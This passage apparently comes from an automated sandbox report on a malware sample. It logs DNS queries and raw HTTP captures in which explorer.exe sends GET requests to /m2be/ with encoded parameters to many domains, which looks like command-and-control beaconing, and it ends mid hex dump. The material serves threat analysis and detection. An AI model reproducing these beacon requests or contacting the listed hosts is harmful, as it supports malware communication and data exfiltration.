                                                                                                Mar 22, 2021 08:56:14.188276052 CET8.8.8.8192.168.2.50x55c2No error (0)www.mantequillahub.pro185.18.52.85A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:19.364322901 CET8.8.8.8192.168.2.50x2efdNo error (0)www.casinoflames.com94.46.58.25A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:25.192636967 CET8.8.8.8192.168.2.50x9ad1No error (0)www.yyxingfa.com103.48.133.159A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:36.942893028 CET8.8.8.8192.168.2.50x89a1Name error (3)www.xcash.fundnonenoneA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:42.046802998 CET8.8.8.8192.168.2.50xac8eNo error (0)www.michaelroberts.gallerymichaelroberts.galleryCNAME (Canonical name)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:42.046802998 CET8.8.8.8192.168.2.50xac8eNo error (0)michaelroberts.gallery192.0.78.25A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:42.046802998 CET8.8.8.8192.168.2.50xac8eNo error (0)michaelroberts.gallery192.0.78.24A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:47.287919998 CET8.8.8.8192.168.2.50x94a4No error (0)www.antiracismbyu.comantiracismbyu.comCNAME (Canonical name)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:47.287919998 CET8.8.8.8192.168.2.50x94a4No error (0)antiracismbyu.com206.189.174.29A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:53.075745106 CET8.8.8.8192.168.2.50x40cdNo error (0)www.rahasiasuksesbo.comrahasiasuksesbo.comCNAME (Canonical name)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:53.075745106 CET8.8.8.8192.168.2.50x40cdNo error (0)rahasiasuksesbo.com180.235.151.22A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:58.557575941 CET8.8.8.8192.168.2.50x37e5Name error (3)www.cvhrcm.comnonenoneA (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • www.maggionaossurvey.com
                                                                                                • www.fenixforex.com
                                                                                                • www.somht.com
                                                                                                • www.capacitaciondelfuturo.com
                                                                                                • www.mantequillahub.pro
                                                                                                • www.casinoflames.com
                                                                                                • www.yyxingfa.com
                                                                                                • www.michaelroberts.gallery
                                                                                                • www.antiracismbyu.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.54971781.17.18.19780C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:55:46.552105904 CET1309OUTGET /m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.maggionaossurvey.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:55:46.618179083 CET1310INHTTP/1.1 200 OK
                                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                                connection: close
                                                                                                content-length: 574
                                                                                                content-type: text/html; charset=utf-8
                                                                                                date: Mon, 22 Mar 2021 07:55:46 GMT
                                                                                                server: nginx
                                                                                                set-cookie: sid=029bed2c-8ae4-11eb-9acc-8cb85d74ab67; path=/; domain=.maggionaossurvey.com; expires=Sat, 09 Apr 2089 11:09:53 GMT; max-age=2147483647; HttpOnly
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 67 67 69 6f 6e 61 6f 73 73 75 72 76 65 79 2e 63 6f 6d 2f 6d 32 62 65 2f 3f 31 62 59 78 54 3d 6d 54 66 70 63 64 57 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4e 6a 51 77 4e 6a 6b 30 4e 69 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 32 4d 7a 6b 35 4e 7a 51 32 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 34 35 62 54 42 69 4e 7a 6b 34 63 33 56 30 63 32 63 30 62 47 73 77 62 47 6c 69 4e 44 49 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 59 7a 4f 54 6b 33 4e 44 59 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 32 4d 7a 6b 35 4e 7a 51 32 4e 6a 41 79 4e 7a 45 79 66 51 2e 71 36 66 58 5a 53 45 71 32 4f 49 35 36 6e 5a 58 64 39 61 63 63 68 6a 33 35 46 75 5f 71 54 46 76 53 76 46 37 62 76 71 6e 53 61 73 26 73 69 64 3d 30 32 39 62 65 64 32 63 2d 38 61 65 34 2d 31 31 65 62 2d 39 61 63 63 2d 38 63 62 38 35 64 37 34 61 62 36 37 26 74 38 72 3d 50 6d 7a 7a 6c 37 78 4e 64 54 6a 78 70 45 37 54 4b 50 55 66 73 32 4b 2b 5a 64 38 48 41 61 6a 31 61 68 59 6c 77 25 32 46 65 34 51 78 54 4c 6a 6e 31 6b 61 39 36 59 48 6d 4a 2b 6e 75 50 57 41 31 39 43 47 42 78 39 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.maggionaossurvey.com/m2be/?1bYxT=mTfpcdW&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNjQwNjk0NiwiaWF0IjoxNjE2Mzk5NzQ2LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG45bTBiNzk4c3V0c2c0bGswbGliNDIiLCJuYmYiOjE2MTYzOTk3NDYsInRzIjoxNjE2Mzk5NzQ2NjAyNzEyfQ.q6fXZSEq2OI56nZXd9acchj35Fu_qTFvSvF7bvqnSas&sid=029bed2c-8ae4-11eb-9acc-8cb85d74ab67&t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw%2Fe4QxTLjn1ka96YHmJ+nuPWA19CGBx9');</script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.549718108.167.156.7080C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:55:57.100789070 CET1311OUTGET /m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.fenixforex.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:55:58.222946882 CET1312INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 22 Mar 2021 07:55:58 GMT
                                                                                                Server: nginx/1.19.5
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: https://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW
                                                                                                X-Server-Cache: true
                                                                                                X-Proxy-Cache: MISS
                                                                                                Set-Cookie: swpm_session=222a49f1071675c3e556858f46bc7736; path=/
                                                                                                X-Accel-Expires: 10800


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.549721172.106.71.2880C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:02.968679905 CET1400OUTGET /m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.somht.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:03.212107897 CET1400INHTTP/1.1 301 Moved Permanently
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 08:04:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                X-Powered-By: PHP/7.3.20
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Location: http://somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW
                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                3192.168.2.549722172.67.161.23580C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:08.818591118 CET1401OUTGET /m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.capacitaciondelfuturo.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:09.084682941 CET1403INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Mon, 22 Mar 2021 07:56:09 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: __cfduid=dfca3bab8700e4192ddf0c8a90af368be1616399768; expires=Wed, 21-Apr-21 07:56:08 GMT; path=/; domain=.capacitaciondelfuturo.com; HttpOnly; SameSite=Lax
                                                                                                Location: https://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 08fa8835160000fa702292b000000001
                                                                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=G0BKUbR%2FlpMmt3IX5E1YQ04cFSqVo4vY1wLzjOuffsD90DXn4tNJjLIrQvCKMdhN6bt2itMnl8SE3OkKcrc8TRucFZpT7GSdCl3N25JLKMhApxPDiQDxStdA%2B9lr4g%3D%3D"}]}
                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 633ddc9b5ebffa70-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 31 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 70 61 63 69 74 61 63 69 6f 6e 64 65 6c 66 75 74 75 72 6f 2e 63 6f 6d 2f 6d 32 62 65 2f 3f 74 38 72 3d 4a 75 47 79 74 75 77 30 49 32 43 76 73 4a 72 68 4b 50 71 78 63 53 73 2b 65 41 48 52 49 68 4d 7a 6d 67 36 6d 32 67 5a 32 53 66 2f 35 45 46 42 71 31 5a 78 7a 53 72 43 41 72 72 63 79 45 42 57 6d 75 38 36 71 26 61 6d 70 3b 31 62 59 78 54 3d 6d 54 66 70 63 64 57 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                Data Ascii: 156<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&amp;1bYxT=mTfpcdW">here</a>.</p></body></html>
                                                                                                Mar 22, 2021 08:56:09.084713936 CET1403INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                4192.168.2.549728185.18.52.8580C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:14.239460945 CET4516OUTGET /m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.mantequillahub.pro
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:14.289760113 CET4518INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 07:56:14 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 7354
                                                                                                Connection: close
                                                                                                Last-Modified: Sat, 13 Feb 2021 16:45:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 2f 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 31 34 78 31 31 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 37 32 78 37 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 36 30 78 36 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 36 30 78 36 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30
                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>404: / 404: Not Found</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="format-detection" content="telephone=no"> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"> <link rel="apple-touch-icon-precomposed" sizes="57x57" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon-precomposed" sizes="60x60" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://hostnl03.fornex.host/40
                                                                                                Mar 22, 2021 08:56:14.289783001 CET4519INData Raw: 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 32 30 78 31 32 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f
                                                                                                Data Ascii: 4/img/favicon/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon-precomposed" sizes="152x152
                                                                                                Mar 22, 2021 08:56:14.289798975 CET4521INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 6d 73 74 69 6c 65 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6d
                                                                                                Data Ascii: content="https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png"> <meta name="msapplication-wide310x150logo" content="https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png"> <meta name="msapplication-square310x310lo
                                                                                                Mar 22, 2021 08:56:14.289814949 CET4522INData Raw: 3e d0 9d d0 b0 d0 b4 d0 b5 d0 b6 d0 bd d1 8b d0 b5 20 56 50 53 2c 20 d0 b2 d1 8b d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b5 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 8b 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b8 20 d0 b4 d0 be
                                                                                                Data Ascii: > VPS, , </div> </div> <div class="table-cell-md ta-r hdn-lg"><a href="https://fornex.com/" style="color: #fff;"><span class="border borde
                                                                                                Mar 22, 2021 08:56:14.289832115 CET4523INData Raw: 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 68 65 6c 70 2f 63 70 61 6e 65 6c 2d 66 69 72 73 74 2d 73 74 65 70 73 2f 22 3e d0 9d d0 b0 d1 87 d0 b0 d0 bb d0 be 20 d1 80 d0 b0 d0 b1 d0 be d1 82 d1 8b 20 d1 81 20 d1 85 d0 be d1 81 d1 82 d0 b8
                                                                                                Data Ascii: tps://fornex.com/help/cpanel-first-steps/"> </a></li> <li><a href="https://fornex.com/help/transfer-site/"> </a></li> </ul>
                                                                                                Mar 22, 2021 08:56:14.289846897 CET4524INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 61 6e 74 69 64 64 6f 73 2f 22 3e 41 6e 74 69 2d 44 44 6f 53 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                                Data Ascii: <a href="https://fornex.com/antiddos/">Anti-DDoS</a></li> <li><a href="https://fornex.com/ssd-hosting/">SSD </a></li> </ul> </div> </div>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                5192.168.2.54972994.46.58.2580C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:19.426618099 CET5006OUTGET /m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.casinoflames.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:19.921107054 CET5007INHTTP/1.1 301 Moved Permanently
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 07:56:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding,Cookie
                                                                                                Expires: Mon, 22 Mar 2021 08:56:19 GMT
                                                                                                Cache-Control: max-age=3600
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                6192.168.2.549730103.48.133.15980C:\Windows\explorer.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Mar 22, 2021 08:56:25.619002104 CET5008OUTGET /m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.yyxingfa.com
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
                                                                                                Mar 22, 2021 08:56:27.880943060 CET5010INHTTP/1.1 200 OK
                                                                                                Date: Mon, 22 Mar 2021 07:56:25 GMT
                                                                                                Server: Apache
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Set-Cookie: PHPSESSID=ppfn15fn958k0hpsuoll01fhm2; path=/
                                                                                                Upgrade: h2
                                                                                                Connection: Upgrade, close
                                                                                                Vary: Accept-Encoding
                                                                                                Transfer-Encoding: chunked
                                                                                                Content-Type: text/html; charset=gbk
                                                                                                Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 33 34 29 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 74 6f 75 79 6f 75 62 65 6e 67 2e 63 6f 6d 2f 65 72 74 65 72 74 20 2d 2d 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 6b 22 3e 3c 74 69 74 6c 65 3e c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 d2 d1 be ad b8 fc c3 fb bb f2 c7 a8 d2 c6 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 20 75 72 6c 3d 2f 64 65 66 61 75 6c 74 2e 68 74 6d 6c 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4d 53 48 54 4d 4c 20 36 2e 30 30 2e 32 39 30 30 2e 33 36 34 30 22 20 6e 61 6d 65 3d 22 47 45 4e 45 52 41 54 4f 52 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 21 2d 2d 0a 2e 53 54 59 4c 45 31 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 2e 53 54 59 4c 45 36 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 09 66 6f 6e 74 2d 